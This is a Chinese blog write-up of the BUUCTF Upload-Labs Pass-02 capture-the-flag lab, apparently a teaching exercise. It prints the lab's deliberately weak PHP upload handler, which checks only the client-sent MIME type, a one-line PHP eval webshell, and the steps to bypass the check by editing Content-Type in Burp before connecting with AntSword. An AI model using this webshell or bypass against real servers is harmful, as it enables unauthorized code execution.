【CTF Web】BUUCTF Upload-Labs-Linux Pass-02 Writeup(文件上传+PHP+MIME绕过)

Upload-Labs-Linux

1
点击部署靶机。

简介

upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。

注意

1.每一关没有固定的通关方法,大家不要自限思维!

2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路。

3.实在没有思路时,可以点击查看提示。

4.如果黑盒情况下,实在做不出,可以点击查看源码。

后续

如在渗透测试实战中遇到新的上传漏洞类型,会更新到upload-labs中。当然如果你也希望参加到这个工作当中,欢迎pull requests给我!

项目地址:https://github.com/c0ny1/upload-labs

任务

上传一个webshell到服务器。

提示

本pass在服务端对数据包的MIME进行检查!

代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

原理

MIME

MIME(Multipurpose Internet Mail Extensions,多用途互联网邮件扩展)是一种互联网标准,它扩展了原始的邮件协议,使得邮件能够发送不只是纯文本,还可以发送如图像、音频、视频等非文本数据。此外,MIME还被广泛应用在数据通信领域,包括 HTTP 的Web传输协议。

MIME 类型是一个标准,用于表示文档、文件或字节流的性质和格式。例如,使用 “text/html” 作为 HTML 文档的 MIME 类型,使用 “image/jpeg” 作为 JPEG 图像。在 HTTP 交互中,MIME 类型被定义在 HTTP 头的 “Content-Type” 中,用来告诉浏览器应该如何处理接收到的内容。

MIME 类型通常由两部分组成:类型和子类型,它们由一个斜线分隔。例如,在 “text/html” 中,“text” 是类型,“html” 是子类型。常见的几种类型有 “text”、“image”、“application”、“video” 等。

在一些情况下,比如上传文件时,服务器会检查文件的 MIME 类型,以确定文件的类型是否被允许。这是一种安全措施,用来防止不安全或者不合法的文件被上传到服务器。

解法

传个一句话木马,

<?php @eval($_POST['a']); ?>

提示:文件类型不正确,请重新上传!

查看网页源代码。

<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
                <p>请选择要上传的图片:</p><p>
                <input class="input_file" type="file" name="upload_file" data-sider-select-id="e7fedb5c-fe6f-4d5a-81bf-51457bff8050">
                <input class="button" type="submit" name="submit" value="上传">
            </p></form>

没有找到 checkFile 函数。

用 Burp 抓包。上传一句话木马。

将 Content-Type:

Content-Type: application/octet-stream

改为:

Content-Type: image/jpeg

上传成功。

右键点击图片,复制图像链接。

http://b4ec024c-ea12-4003-a944-4d3d47076d7d.node5.buuoj.cn:81/upload/a.php

通过蚁剑连接。

访问根目录。

找到 flag。

Flag

flag{e5c6ec40-25ad-4ef3-bd64-22ae1e9cd061}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值